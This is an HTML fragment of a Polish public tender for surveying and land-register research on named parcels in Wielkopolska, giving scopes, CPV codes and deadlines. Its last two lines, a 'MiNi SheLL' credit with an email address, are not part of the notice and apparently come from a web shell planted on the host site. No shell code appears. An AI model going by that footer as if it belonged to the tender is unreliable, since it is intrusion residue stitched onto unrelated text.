<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ustalenie ksiąg wieczystych i wykonanie badania stanu prawnego nieruchomości z historią byłego właściciela w okresie 1939 do 1992 z podaniem podstawy prawnej przejęcia na Skarb Państwa, a w przypadku powtarzających się opisanie tych podstaw prawnych przejęcia (decyzje, orzeczenia, protokoły etc.). Rezultatem tego opracowania powinno być:
- ustalenie księgi wieczystej
- na kopii mapy ewidencyjnej wykreślona działka ewidencyjna,
- wykreślenie sytuacji własnościowej na dzień 1.09.1939r. oraz dalsza historia właścicieli spowodowana różnymi okolicznościami (parcelacja, wymiana, regulacja, scalanie, wywłaszczenie itp.) Zamówienie dotyczy:
Obręb Zamęty gmina Mycielin - działka nr : 616/1,  
Obręb Przyranie gmina Mycielin - działka nr 901/2
- sporządzenie wyciągu synchronizacyjnego 
obręb  Miasto Kalisz działki nr 1  i nr 44/3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wykonanie weryfikacji danych ewidencyjnych w celu sporządzenia kartoteki budynku (§ 26 ust 1 Rozp. Ministra Rozwoju Regionalnego i Budownictwa z dn. 29.03.2001 w sprawie ewidencji gruntów i budynków) dla nieruchomości położonych w Topoli gmina Środa Wlkp. oraz Runowie gmina Kórnik..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie weryfikacji danych ewidencyjnych w celu sporządzenia kartoteki budynku (§ 26 ust 1 Rozp. Ministra Rozwoju Regionalnego i Budownictwa z dn. 29.03.2001 w sprawie ewidencji gruntów i budynków) dla niżej wymienionych nieruchomości:
GMINA  ŚRODA  WLKP.
1. Topola 1
Budynek mieszkalny położony na działce nr 11/27 o powierzchni użytkowej 0,4847 ha zapisana w KW PO1D/00005196/7  prowadzonej przez Sąd Rejonowy w Środzie Wlkp.
GMINA Kórnik
2. Runowo 61
Budynek mieszkalny położony na działce nr 109/3 o powierzchni użytkowej 0,3762 ha zapisana w KW PO1D/00027672/8  prowadzonej przez Sąd Rejonowy w Środzie Wlkp.
3. Runowo 62
Budynek mieszkalny położony na działce nr 113/7 o powierzchni użytkowej 0,3664 ha zapisana w KW PO1D/00027674/2  prowadzonej przez Sąd Rejonowy w Środzie Wlkp.
4. Runowo 63
Budynek mieszkalny położony na działce nr 113/4 o powierzchni użytkowej 0,2986 ha zapisana w KW 27673  prowadzonej przez Sąd Rejonowy w Środzie Wlkp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Podział geodezyjny nieruchomości położonych w obrębie Wituchowo, gmina Kwilcz, oznaczonych w ewidencji gruntów jako działki nr 10/11 i 6..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podział geodezyjny nieruchomości położonych w obrębie Wituchowo, gmina Kwilcz, oznaczonych w ewidencji gruntów jako działki nr 10/11 i 6 polegający na wydzieleniu śródlądowej wody powierzchniowej płynącej o nazwie Struga Kwilecka. Wydzielenie należy przeprowadzić w uzgodnieniu z Wielkopolskim Zarządem Melioracji i Urządzeń Wodnych Inspektorat w Obornikach z siedzibą w Przyborowie oraz dostarczyć pełną dokumentację geodezyjno - prawną zgodnie z przepisami prawa w tym zakresie. Szkic działki - załącznik nr 6a do SIWZ.
Wstępny projekt podziału geodezyjnego winien być przedstawiony do akceptacji w Agencji Nieruchomości Rolnych.
Dla w/w nieruchomości brak jest obowiązującego miejscowego planu zagospodarowania przestrzennego. W studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka nr 6 oznaczona jest jako grunt rolny o mniejszej przydatności dla rolnictwa a działka nr 10/11 oznaczona jest jako grunty orne o mniejszej przydatności dla rolnictwa, w cz. Łąki, w cz. Lasy pozostałe, w cz. Tereny występowania surowców pospolitych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Sporządzenie protokołu z przeprowadzenia badania stanu prawnego nieruchomości położonych: w obrębie Glinno gm. Skoki oraz obrębie Raczkowo gm. Skoki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie protokołu z przeprowadzenia badania stanu prawnego nieruchomości położonych:
1/ w obrębie Glinno gm. Skoki dz. oznaczone w ewidencji gruntów nr 21/13 o pow. 131,6557 ha, nr 29/23 o pow. 115,5661 ha, nr 22/3 o pow. 16,84 ha, 
2/ w obrębie Raczkowo gm. Skoki dz. oznaczona w ewidencji gruntów nr 15 o pow. 13,39 ha, 
pod kątem  ustalenia nazwiska byłych właścicieli od 1939 roku do roku 1992 oraz podania podstawy prawnej przejęcia w/w nieruchomości na Skarb Państwa z podaniem litery /gdy jest ona ujawniona/ w przypadku dekretu o reformie rolnej a także sporządzenia mapy ewidencyjnej z aktualnym oznaczeniem działek będących w dzierżawie, na której jednym kolorem szrafury wkreślony będzie część przedmiotu dzierżawy, następnie odrębną szrafurą naniesiona zostanie ewentualna cześć przedwojennego majątku ziemskiego oraz wkreślona zostanie ewentualnie przeprowadzona parcelacja na tych gruntach. Geodeta uprawniony winien zweryfikować informacje będące w posiadaniu tut. Oddziału tj. b. właścicielem w/w działek położonych w obrębie Glinno był p. Hieronim Sławiński /tom 1 karta 1 Glinno/ a działki nr 15 w Raczakowie - Zaborowska Izabella geb. von Ponińska /tom 1 karta 1 dobra rycerskie Raczkowo/ i p. Maksymilian Luckner to, 1 karta 2 Glinno/.
Geodeta uprawniony winien dostarczyć do tut. Oddziału jako załącznik do protokołu zdawczo odbiorczego - komplet dokumentów celem przeniesienia własności tj. wypisy i wyrysy dot. w/w działek /każda działka oddzielnie/ oraz wyciągi z wykazu zmian gruntowych potwierdzone przez Starostwo Powiatowe w Wągrowcu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com